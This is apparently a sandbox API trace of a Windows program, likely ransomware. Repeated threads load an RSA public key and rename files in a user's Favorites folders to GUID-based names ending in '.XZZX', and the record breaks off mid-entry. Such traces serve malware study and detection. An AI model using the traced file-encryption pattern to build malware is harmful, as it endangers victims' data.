LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0180.034] lstrcpyW (in: lpString1=0x2aaf460, lpString2="72A6C9432269CCE1A510518B2681B129.XZZX" | out: lpString1="72A6C9432269CCE1A510518B2681B129.XZZX") returned="72A6C9432269CCE1A510518B2681B129.XZZX" [0180.035] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0180.035] SetErrorMode (uMode=0x1) returned 0x1 [0180.035] lstrcpyW (in: lpString1=0x2aaf860, lpString2="72A6C9432269CCE1A510518B2681B129.XZZX" | out: lpString1="72A6C9432269CCE1A510518B2681B129.XZZX") returned="72A6C9432269CCE1A510518B2681B129.XZZX" [0180.035] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x20777190, Data2=0xffe0, Data3=0x4dd9, Data4=([0]=0xa0, [1]=0x0, [2]=0x3a, [3]=0xa6, [4]=0xed, [5]=0xb, [6]=0x40, [7]=0xab))) returned 0x0 [0180.035] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\72A6C9432269CCE1A510518B2681B129.XZZX") returned 81 [0180.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0180.035] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\62A1CE004DCF44E020777190507A2928.XZZX") returned 81 [0180.035] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 646 os_tid = 0xc18 [0180.194] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0180.194] lstrcpyW (in: lpString1=0x2aaf460, lpString2="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" | out: lpString1="15DC3754190A8EA84ED7A99B1D2272F0.XZZX") returned="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" [0180.194] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0180.194] SetErrorMode (uMode=0x1) returned 0x1 [0180.194] lstrcpyW (in: lpString1=0x2aaf860, lpString2="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" | out: lpString1="15DC3754190A8EA84ED7A99B1D2272F0.XZZX") returned="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" [0180.194] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xdcd707c6, Data2=0x7088, Data3=0x45f0, Data4=([0]=0xa3, [1]=0x9f, [2]=0x23, [3]=0x41, [4]=0xe0, [5]=0x2d, [6]=0xdd, [7]=0x23))) returned 0x0 [0180.194] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\15DC3754190A8EA84ED7A99B1D2272F0.XZZX") returned 87 [0180.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0180.194] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\65A2C1301EBE2780DCD707C621690BC8.XZZX") returned 87 [0180.194] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 647 os_tid = 0xc1c [0180.343] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0180.343] lstrcpyW (in: lpString1=0x2aaf460, lpString2="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" | out: lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX") returned="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" [0180.343] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0180.343] SetErrorMode (uMode=0x1) returned 0x1 [0180.343] lstrcpyW (in: lpString1=0x2aaf860, lpString2="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" | out: lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX") returned="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" [0180.343] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x2af193c, Data2=0x94a3, Data3=0x48f9, Data4=([0]=0xac, [1]=0xd3, [2]=0xad, [3]=0xb6, [4]=0xd5, [5]=0x26, [6]=0x4d, [7]=0xa))) returned 0x0 [0180.343] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\8E5ECE9444DBAF1A59BC413E48F39362.XZZX") returned 87 [0180.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0180.343] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\F013C1342A5E6A8B02AF193C2D094ED3.XZZX") returned 87 [0180.343] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 648 os_tid = 0xc20 [0180.502] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0180.502] lstrcpyW (in: lpString1=0x2aaf460, lpString2="B8440918056E9F026EA48C8C0986834A.XZZX" | out: lpString1="B8440918056E9F026EA48C8C0986834A.XZZX") returned="B8440918056E9F026EA48C8C0986834A.XZZX" [0180.502] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0180.502] SetErrorMode (uMode=0x1) returned 0x1 [0180.502] lstrcpyW (in: lpString1=0x2aaf860, lpString2="B8440918056E9F026EA48C8C0986834A.XZZX" | out: lpString1="B8440918056E9F026EA48C8C0986834A.XZZX") returned="B8440918056E9F026EA48C8C0986834A.XZZX" [0180.502] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x47007bef, Data2=0xe1c7, Data3=0x4a0f, Data4=([0]=0x8b, [1]=0x2e, [2]=0x77, [3]=0x30, [4]=0xd6, [5]=0xe2, [6]=0x22, [7]=0x68))) returned 0x0 [0180.502] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\B8440918056E9F026EA48C8C0986834A.XZZX") returned 87 [0180.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0180.502] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\9E4D65C94150C0A947007BEF43FBA4F1.XZZX") returned 87 [0180.502] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 649 os_tid = 0xc24 [0180.661] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0180.661] lstrcpyW (in: lpString1=0x2aaf460, lpString2="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" | out: lpString1="1844FE2A092A01627C9EB5E50D41E5AA.XZZX") returned="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" [0180.661] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0180.661] SetErrorMode (uMode=0x1) returned 0x1 [0180.661] lstrcpyW (in: lpString1=0x2aaf860, lpString2="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" | out: lpString1="1844FE2A092A01627C9EB5E50D41E5AA.XZZX") returned="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" [0180.661] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xbcbffb97, Data2=0xd983, Data3=0x4cd1, Data4=([0]=0xa6, [1]=0x24, [2]=0x79, [3]=0xf8, [4]=0xca, [5]=0x6b, [6]=0x21, [7]=0x33))) returned 0x0 [0180.661] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\1844FE2A092A01627C9EB5E50D41E5AA.XZZX") returned 100 [0180.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0180.661] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\5280BD45414477F3BCBFFB9743EF5C3B.XZZX") returned 100 [0180.661] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 650 os_tid = 0xc28 [0180.811] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0180.811] lstrcpyW (in: lpString1=0x2aaf460, lpString2="1B49B9E018F35807975DC8201D0B3C4F.XZZX" | out: lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX") returned="1B49B9E018F35807975DC8201D0B3C4F.XZZX" [0180.811] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0180.811] SetErrorMode (uMode=0x1) returned 0x1 [0180.811] lstrcpyW (in: lpString1=0x2aaf860, lpString2="1B49B9E018F35807975DC8201D0B3C4F.XZZX" | out: lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX") returned="1B49B9E018F35807975DC8201D0B3C4F.XZZX" [0180.811] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xea0830df, Data2=0x23c4, Data3=0x46ae, Data4=([0]=0xbb, [1]=0xfb, [2]=0xff, [3]=0xa0, [4]=0x33, [5]=0xa1, [6]=0x8d, [7]=0x9))) returned 0x0 [0180.811] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\1B49B9E018F35807975DC8201D0B3C4F.XZZX") returned 100 [0180.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0180.811] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\4CF3E7BC09DFE738EA0830DF0C8ACB80.XZZX") returned 100 [0180.811] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 651 os_tid = 0xc2c [0180.967] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0180.967] lstrcpyW (in: lpString1=0x2aaf460, lpString2="30FEF3B4011ABE0E503ED66C0532A256.XZZX" | out: lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX") returned="30FEF3B4011ABE0E503ED66C0532A256.XZZX" [0180.967] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0180.967] SetErrorMode (uMode=0x1) returned 0x1 [0180.967] lstrcpyW (in: lpString1=0x2aaf860, lpString2="30FEF3B4011ABE0E503ED66C0532A256.XZZX" | out: lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX") returned="30FEF3B4011ABE0E503ED66C0532A256.XZZX" [0180.967] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x9f0e8695, Data2=0x65b4, Data3=0x4f4e, Data4=([0]=0x90, [1]=0xf1, [2]=0x42, [3]=0x11, [4]=0x9b, [5]=0xdf, [6]=0xff, [7]=0x42))) returned 0x0 [0180.967] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\30FEF3B4011ABE0E503ED66C0532A256.XZZX") returned 100 [0180.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0180.968] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\914F69C41F8188D89F0E8695222C6D20.XZZX") returned 100 [0180.968] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 652 os_tid = 0xc30 [0181.123] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0181.123] lstrcpyW (in: lpString1=0x2aaf460, lpString2="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" | out: lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX") returned="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" [0181.123] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0181.123] SetErrorMode (uMode=0x1) returned 0x1 [0181.123] lstrcpyW (in: lpString1=0x2aaf860, lpString2="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" | out: lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX") returned="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" [0181.123] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x9e109e9b, Data2=0x9888, Data3=0x4172, Data4=([0]=0x92, [1]=0xa, [2]=0x8a, [3]=0x31, [4]=0x84, [5]=0x14, [6]=0x6c, [7]=0x61))) returned 0x0 [0181.123] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\B2A8C78F28F146042377D2FD2D1E2A4C.XZZX") returned 100 [0181.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0181.123] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\D7004A5826FE74909E109E9B29A958D8.XZZX") returned 100 [0181.123] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 653 os_tid = 0xc34 [0181.279] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0181.279] lstrcpyW (in: lpString1=0x2aaf460, lpString2="FD9030E848C62D90344A51E94CDE11D8.XZZX" | out: 